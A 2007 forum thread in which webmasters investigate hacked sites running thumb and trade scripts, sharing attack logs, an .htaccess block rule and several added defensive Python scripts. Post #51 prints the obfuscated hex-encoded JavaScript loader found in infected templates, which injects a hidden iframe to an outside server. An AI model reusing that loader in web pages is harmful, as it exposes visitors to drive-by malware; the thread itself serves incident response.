
Thread: We need to talk SECURITY!!! NOW!!

  1. #41
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    Quote Originally Posted by rowan
    Are you on a managed box?

    Is your OS, Apache, PHP etc upgraded to the latest version?

    Are you using a control panel which may also need to be upgraded?

    What other third party scripts exist on this box? If you've had it for a while, think back to scripts that you may not use any more, but are still located on the server.
    Hey Rowan...

    I'm running CentOS, and I believe that Apache and PHP are upgraded to the latest version. I'm hosted over at yellowfiber, but am not fully managed. I don't use a control panel.

    Scripts that I have still are:
    ATX
    ST
    Arylia
    Gallery Daemon
    linkex
    EPT

    I've just removed old copies of AT3 I don't use anymore.

    I will check things out here, though it seems the hack first started on my teenielips.com site where I had atx/st/linkex.

    Digging deeper today, but I would very much value your assistance .... I know you're a guru.

  2. #42
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    oh... and I used to have slothtrader on there too

  3. #43
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    bump

  4. #44
    pbracc (Devil) | Join Date: May 2006 | Location: 4, 8, 15, 16, 23, 42 | Posts: 3,283

    Just hacked another of my sites; one had been 3 weeks ago, and obviously I've changed all the passes. This is the IP that got into my AT3: 208.53.158.26. I remember the last time was a similar IP; the first number was maybe the same or 207, I don't remember exactly.

    But it looks like it's getting popular to try to get into my script; here's somebody who tried some id/pass manually:
    69.93.211.234 tried to login with webmaster / pass.
    20:31 - 04 Dec 69.93.211.234 tried to login with atx / admin.
    20:30 - 04 Dec 69.93.211.234 tried to login with admin / p@ssword.
    20:27 - 04 Dec 69.93.211.234 tried to login with admin / asdfgh.
    20:25 - 04 Dec 69.93.211.234 tried to login with admin / qwerty.
    20:23 - 04 Dec 69.93.211.234 tried to login with admin / 123456.
    20:22 - 04 Dec 69.93.211.234 tried to login with admin / password.
    20:19 - 04 Dec 69.93.211.234 tried to login with admin / admin.
    20:17 - 04 Dec 69.93.211.234 tried to login with admin / pass.
    20:14 - 04 Dec 69.93.211.234 tried to login with user / pass.

    He obviously couldn't get in, but it's funny.
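
    The failure list above is the kind of record a threshold rule can act on. What follows is an added example, not code from the post or from the AT3/ATX scripts: it parses lines in exactly the format pbracc pasted, counts failures per source IP inside a sliding time window, and lists the usernames one source tried. The log carries no year, so the parser assumes one; the threshold of 5 failures in 30 minutes is an assumed tuning value.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sample input: the failure lines as pasted in the post above. The first line has no
# timestamp in the post, and is kept that way to show the parser tolerating it.
SAMPLE_LOG = """\
69.93.211.234 tried to login with webmaster / pass.
20:31 - 04 Dec 69.93.211.234 tried to login with atx / admin.
20:30 - 04 Dec 69.93.211.234 tried to login with admin / p@ssword.
20:27 - 04 Dec 69.93.211.234 tried to login with admin / asdfgh.
20:25 - 04 Dec 69.93.211.234 tried to login with admin / qwerty.
20:23 - 04 Dec 69.93.211.234 tried to login with admin / 123456.
20:22 - 04 Dec 69.93.211.234 tried to login with admin / password.
20:19 - 04 Dec 69.93.211.234 tried to login with admin / admin.
20:17 - 04 Dec 69.93.211.234 tried to login with admin / pass.
20:14 - 04 Dec 69.93.211.234 tried to login with user / pass.
"""

# "HH:MM - DD Mon IP tried to login with USER / PASSWORD." with the time prefix optional
LINE_RE = re.compile(
    r"^(?:(?P<time>\d{2}:\d{2}) - (?P<day>\d{2}) (?P<mon>[A-Za-z]{3}) )?"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) tried to login with (?P<user>\S+) / (?P<pw>.+?)\.$"
)

def parse_failures(text, year=2007):
    """Return (timestamp or None, ip, user, password) per line. The log carries no year,
    so one is assumed; a line without a time prefix gets timestamp None."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = None
        if m.group("time"):
            stamp = "%d %s %s %s" % (year, m.group("day"), m.group("mon"), m.group("time"))
            ts = datetime.strptime(stamp, "%Y %d %b %H:%M")
        events.append((ts, m.group("ip"), m.group("user"), m.group("pw")))
    return events

def flag_bruteforce(events, threshold=5, window=timedelta(minutes=30)):
    """Return {ip: total_failures} for sources with at least `threshold` timestamped
    failures inside any `window`; threshold and window are assumed tuning values."""
    stamps_by_ip = defaultdict(list)
    for ts, ip, _, _ in events:
        if ts is not None:
            stamps_by_ip[ip].append(ts)
    flagged = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        for i, start in enumerate(stamps):
            # count failures in [start, start + window]; flag on the first window that fills
            if sum(1 for t in stamps[i:] if t - start <= window) >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged

def usernames_tried(events, ip):
    """Distinct accounts one source guessed: shows whether the attacker knows a real login."""
    return sorted({user for _, src, user, _ in events if src == ip})

if __name__ == "__main__":
    events = parse_failures(SAMPLE_LOG)
    for ip, count in flag_bruteforce(events).items():
        print(ip, "failures:", count, "usernames:", usernames_tried(events, ip))
```

    Run against the script's real failure log the same way; anything flag_bruteforce returns is a source worth blocking at the firewall rather than waiting for it to find a working pair.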

  5. #45
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    pbracc, that's the same IP that's been up to this all along... I've been talking with my admin and think we will have some news for you soon.

  6. #46
    Spudstr (Daddy VPS) | Join Date: Sep 2006 | Posts: 1,741

    I believe there is a security problem with at3.
    208.53.158.26 - - [05/Dec/2007:10:25:27 -0500] "GET /cgi-bin/atx/x/admin.cgi?id=41 HTTP/1.0" 200 20497 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:28 -0500] "GET /cgi-bin/atx/x/admin.cgi?id=41 HTTP/1.0" 200 19590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:29 -0500] "GET /cgi-bin/at3/admin.cgi?id=13 HTTP/1.0" 200 16069 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:31 -0500] "GET / HTTP/1.0" 200 146094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:33 -0500] "GET / HTTP/1.0" 200 78044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:36 -0500] "POST /cgi-bin/atx/x/x2.cgi HTTP/1.0" 200 1935 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:38 -0500] "POST /cgi-bin/at3/x/x2.cgi HTTP/1.0" 200 2250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:40 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:42 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:46 -0500] "GET /images/backup.php?l=2 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:49 -0500] "GET /images/backup.php?l=2 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:50 -0500] "GET /images/backup.php?l=3 HTTP/1.0" 200 56 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:52 -0500] "GET /images/backup.php?l=3 HTTP/1.0" 200 55 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:56 -0500] "POST /cgi-bin/atx/x/x2.cgi HTTP/1.0" 200 1935 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    208.53.158.26 - - [05/Dec/2007:10:25:56 -0500] "POST /cgi-bin/at3/x/x2.cgi HTTP/1.0" 200 2250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    The backup.php script is empty at the moment.

    The IP resolves to a netblock belonging to fdcservers.com. I suggest anyone running at3 check their stuff/logs for this IP and post it here.
    Managed Hosting | Colocation | Network Services
    http://www.yellowfiber.net
    icq: 19876563
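
    What the log above shows is a sequence rather than a single bad request: a POST to x2.cgi from one IP, followed within seconds by GETs to a PHP file under /images/ that did not exist before and answers 200 with a body of about 50 bytes. The script below is added here and is not Spudstr's code or part of any script named in the thread; it parses Apache combined-format lines and reports clients that fit that sequence. The sample lines are copied from the post, plus one constructed benign request from 198.51.100.7 (a documentation address) so a non-match is visible. The CGI name, the /images/*.php pattern and the size cut-off are assumptions drawn from the log above.

```python
import re
from collections import defaultdict

# Sample input: access-log lines copied from the post above, plus one constructed
# benign request from 198.51.100.7 to show a non-match.
SAMPLE_LOG = """\
208.53.158.26 - - [05/Dec/2007:10:25:27 -0500] "GET /cgi-bin/atx/x/admin.cgi?id=41 HTTP/1.0" 200 20497 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:36 -0500] "POST /cgi-bin/atx/x/x2.cgi HTTP/1.0" 200 1935 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:38 -0500] "POST /cgi-bin/at3/x/x2.cgi HTTP/1.0" 200 2250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:40 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:42 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [05/Dec/2007:10:30:01 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_access_log(text):
    """Return one dict per well-formed line; malformed lines are skipped, not guessed at."""
    rows = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row["status"] = int(row["status"])
        row["size"] = 0 if row["size"] == "-" else int(row["size"])
        rows.append(row)
    return rows

# Indicators are assumptions drawn from the log above: the CGI that received the POST,
# the directory that should only hold images, and the small 200 replies from the new file.
DROPPED_RE = re.compile(r"^/images/[^/?]+\.php$")

def find_dropper_sequence(rows, cgi_name="x2.cgi", max_size=200):
    """Return {ip: [paths]} for clients that POSTed to cgi_name and afterwards fetched a
    PHP file under /images/ that answered 200 with a body no larger than max_size bytes."""
    posted_to_cgi = set()
    hits = defaultdict(list)
    for r in rows:  # rows are assumed to be in log order
        path = r["path"].split("?", 1)[0]
        if r["method"] == "POST" and path.endswith("/" + cgi_name):
            posted_to_cgi.add(r["ip"])
        elif (r["method"] == "GET" and r["ip"] in posted_to_cgi
              and DROPPED_RE.match(path) and r["status"] == 200 and r["size"] <= max_size):
            hits[r["ip"]].append(r["path"])
    return dict(hits)

def requests_from(rows, ip):
    """All paths one client requested, in order: what to pull for every IP that gets flagged."""
    return [r["path"] for r in rows if r["ip"] == ip]

if __name__ == "__main__":
    rows = parse_access_log(SAMPLE_LOG)
    for ip, paths in find_dropper_sequence(rows).items():
        print(ip, "dropped-file fetches:", paths)
        print("  full request list:", requests_from(rows, ip))
```

    The point of keying on the sequence rather than on the IP alone is that the next attacker will come from a different netblock; the POST-then-fetch-a-new-PHP-file pattern is what stays the same.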

  7. #47

    Quote Originally Posted by Spudstr
    I believe there is a security problem with at3.
    But I have no at3 on my hacked domain.

  8. #48
    Niclu (I need help) | Join Date: Nov 2007 | Posts: 12

    I got hit too on one of my domains today. I do not have ATX & ST on that site, but Trade Expert, so I have a hard time believing that the trade/thumb scripts we are using are the reason for all this.

  9. #49

    It seems like the hole is in x2.cgi. My logs looked exactly the same as Spudstr's. Two requests on x2.cgi and then requests on backup.php (this one created by the hole in x2.cgi, I guess, because backup.php was never there before).

    Also, this time I found this in /var/log/messages:
    ---- cut -------
    kernel: pid 56849 (x2.cgi), uid 1003: exited on signal 11 (core dumped)
    ---- end cut -------

    So here is a vanilla .htaccess rule that will allow requests on x2.cgi from your own IPs only and block others. Just place it in the same dir where x2.cgi resides.

    Code:
    <Files x2.cgi>
        # Apache 2.2 mod_authz_host: with "Order allow,deny", anything not matched by an
        # Allow is refused; "Deny from all" just makes that explicit.
        Order allow,deny
        Deny from all
        Allow from 10.10.10.10 20.20.20.20
        # Apache 2.4 (mod_authz_core) equivalent: Require ip 10.10.10.10 20.20.20.20
    </Files>

  10. #50
    Spudstr (Daddy VPS) | Join Date: Sep 2006 | Posts: 1,741

    Quote Originally Posted by Niclu
    I got hit too on one of my domains today. I do not have ATX & ST on that site, but Trade Expert, so I have a hard time believing that the trade/thumb scripts we are using are the reason to all this.
    No, but what was the code in your scripts? We need to compare apples to apples and not to other hacks/exploits.

  11. #51
    Niclu (I need help) | Join Date: Nov 2007 | Posts: 12

    Quote Originally Posted by Spudstr
    No but what was the code in your scripts? need to compare apples to apples and not to other hacks/exploits.

    Well, first I couldn't find the code, but after seeing a difference in the size of the hacked file and the original file I knew something was wrong. The only way for me to finally see the code was in UltraEdit32 to select all the code and then "Convert Wrap to CR/LFs". I have no idea what that wrap function is doing, but after I did that this code appeared.


    Code:
    // Loader as found in the template (hex string rejoined onto one line). Each hex pair is
    // prefixed with '%' (String.fromCharCode(37)), unescape() turns '%XX' back into text, and
    // document.write() injects the result, which decodes to:
    //   <iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>
    var s='3C696672616D65207372633D22687474703A2F2F3139352E352E3131362E3235302F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E';
    var o='';
    for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2); }
    document.write(unescape(o));
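
    The snippet above is the usual two-stage loader: a hex string, turned into %XX escapes and run through unescape(), then written into the page. The scanner below is an added example (not from the post, not from UltraEdit or any of the thumb/trade scripts): it recognises that pattern in a template, decodes the string offline without executing it, and pulls out the iframe source. The sample input is the snippet from the post rejoined onto one line; the regexes are assumptions about this particular obfuscation and will not catch other variants.

```python
import re

# Sample input: the injected snippet from the post above, rejoined onto one line
# (the post shows it wrapped). It is data only and is never executed here.
INJECTED_JS = (
    "var s='3C696672616D65207372633D22687474703A2F2F3139352E352E3131362E3235302F65782F7374617469632E706870"
    "222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E';"
    " var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); "
    "o=o+c+s.substr(i,2);} document.write(unescape(o));"
)

# Assumed signature of this particular loader: a hex literal assigned to s, a loop that
# prefixes each pair with '%' (char 37) and a final unescape(). Whitespace inside the hex
# literal is tolerated because the files were found line-wrapped.
HEX_LITERAL_RE = re.compile(r"var\s+s\s*=\s*'([0-9A-Fa-f\s]{2,})'")
DECODER_RE = re.compile(r"String\.fromCharCode\(\s*37\s*\).*?unescape\(", re.S)
IFRAME_SRC_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*"([^"]+)"', re.I)

def decode_hex_literal(hex_text):
    """Reproduce '%XX' + unescape() offline: each hex pair becomes one character."""
    clean = re.sub(r"\s+", "", hex_text)
    if len(clean) % 2:
        return None  # unescape() would leave a dangling '%X'; treat as not this loader
    # unescape('%XX') yields the Latin-1 character with that code, so latin-1 is exact here
    return bytes.fromhex(clean).decode("latin-1")

def scan_text(text):
    """Return [(decoded_html, iframe_src_or_None)] for every loader instance in text."""
    findings = []
    if not DECODER_RE.search(text):
        return findings
    for m in HEX_LITERAL_RE.finditer(text):
        html = decode_hex_literal(m.group(1))
        if html is None:
            continue
        src = IFRAME_SRC_RE.search(html)
        findings.append((html, src.group(1) if src else None))
    return findings

def scan_files(paths):
    """Map path -> findings for each template file that carries the loader."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as f:
            findings = scan_text(f.read())
        if findings:
            report[path] = findings
    return report

if __name__ == "__main__":
    for html, src in scan_text(INJECTED_JS):
        print("decoded:", html)
        print("iframe points at:", src)
```

    Feeding scan_files() every template on the box answers the question several posters are asking (which files carry it) and gives the decoded iframe target to block at the firewall or report to the host, without opening the file in a browser.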

  12. #52
    Just trolling | Join Date: Oct 2006 | Posts: 6

    haha, I was fucked by this fuckin shit on Dec 4, lol, and caught it just today, holy shit

  13. #53

    I've been following this, but so far I haven't been able to cross-reference the hacks to a single common script. Unless not everybody is listing every script.
    Anyway, just to rule atx out, I've added encryption to the next build.

    Spudstr, please only post messages about holes in AT3 if you have hard evidence, not because you believe it. That's very damaging...
    Contact me if you have any logs that could help.

  14. #54
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    bump.... thanks to all who are investigating

  15. #55
    Therapy (mooo00000) | Join Date: Jun 2006 | Location: Europe | Posts: 725

    Big thank you, Spudstr, for looking into this. Now is there anything we can do to stop this happening again while we wait for a patch?

  16. #56
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    So TNT and I both got hit again last night!!!
    Not sure how or what just yet.... stay tuned.

  17. #57
    Niclu (I need help) | Join Date: Nov 2007 | Posts: 12

    Ouch, a couple of other domains on my server were hacked as well, I just found out. I use ST/ATX on those sites, and as usual the ST template files were modified.

  18. #58
    sippin' remy | Join Date: Feb 2007 | Location: Zeta Reticuli | Posts: 201

    I found that exact script code in every single one of my smart thumbs templates on my webair server! What the fuck!?!?! This is such bullshit man...

    I have no clue what to do. I deleted them all last night but then today the code reappeared. Fucking bullshit...

  19. #59
    The Professional (I like money) | Join Date: Nov 2006 | Location: Canada | Posts: 1,511

    Yes, it seems to happen every night to me as well... I recommend chmodding your templates to 444 after you've cleaned them... and maybe setting the amount of clicks till template refresh a little lower.

    it seems the hacker has been attacking the mainpages directly now on some of my sites grabbing some traffic before they are over written by a clean template
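
    The two posts above say the same thing: templates that were cleaned were dirty again the next morning, so a cleanup needs a way to notice the next rewrite. The script below is an added example, not code from the thread or from ST/ATX: it takes a SHA-256 baseline of the template tree right after cleaning, diffs the tree against it later (rewritten, newly dropped and deleted files), and lists baseline files that still carry a write bit, i.e. where the chmod 444 advice was not applied. One caveat the advice does not mention: mode 444 only stops writes from other uids; code running as the file's owner (as it does under suexec-style CGI) can chmod it back, and a writable parent directory lets the file be replaced outright, so treat the mode check as a tripwire rather than a lock. The directory layout, file suffixes and the "reinfection" in the demo are constructed.

```python
import hashlib
import os
import stat
import tempfile

TEMPLATE_SUFFIXES = (".html", ".htm", ".tpl", ".php", ".cgi", ".js")  # assumed set

def file_digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root):
    """Relative path -> sha256 for every template-like file under root, taken right after cleaning."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(TEMPLATE_SUFFIXES):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = file_digest(full)
    return baseline

def compare(root, baseline):
    """Diff the tree against the saved baseline: rewritten, newly dropped, and deleted files."""
    current = snapshot(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

def still_writable(root, baseline):
    """Baseline files whose mode still has any write bit, i.e. chmod 444 was not applied.
    A process running as the file owner can chmod it back, so this is a tripwire, not a lock."""
    out = []
    for rel in baseline:
        mode = os.stat(os.path.join(root, rel)).st_mode
        if mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH):
            out.append(rel)
    return sorted(out)

def demo():
    """Constructed scenario: two clean templates, a baseline, one template locked with 444,
    then an overnight reinfection that rewrites the other one and drops a new PHP file."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "templates")
        os.mkdir(tpl)
        for name in ("index.html", "gallery.html"):
            with open(os.path.join(tpl, name), "w") as f:
                f.write("<html><body>clean</body></html>\n")
            os.chmod(os.path.join(tpl, name), 0o644)
        baseline = snapshot(root)
        os.chmod(os.path.join(tpl, "gallery.html"), 0o444)
        unlocked = still_writable(root, baseline)
        with open(os.path.join(tpl, "index.html"), "a") as f:
            f.write("<script>var s='3C';</script>\n")  # stand-in for the hex loader
        with open(os.path.join(root, "backup.php"), "w") as f:
            f.write("<?php ?>\n")
        return unlocked, compare(root, baseline)

if __name__ == "__main__":
    unlocked, diff = demo()
    print("still writable after cleanup:", unlocked)
    print("changes since baseline:", diff)
```

    In practice, write the baseline dict to a file outside the web root (or off the box), run compare() from cron every few minutes, and mail the result; a non-empty "modified" or "added" list tells you both that the hole is still open and exactly which files to look at.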

  20. #60

    Guys, but what about me? I am not using ST and am getting the same shit on my AGS templates.
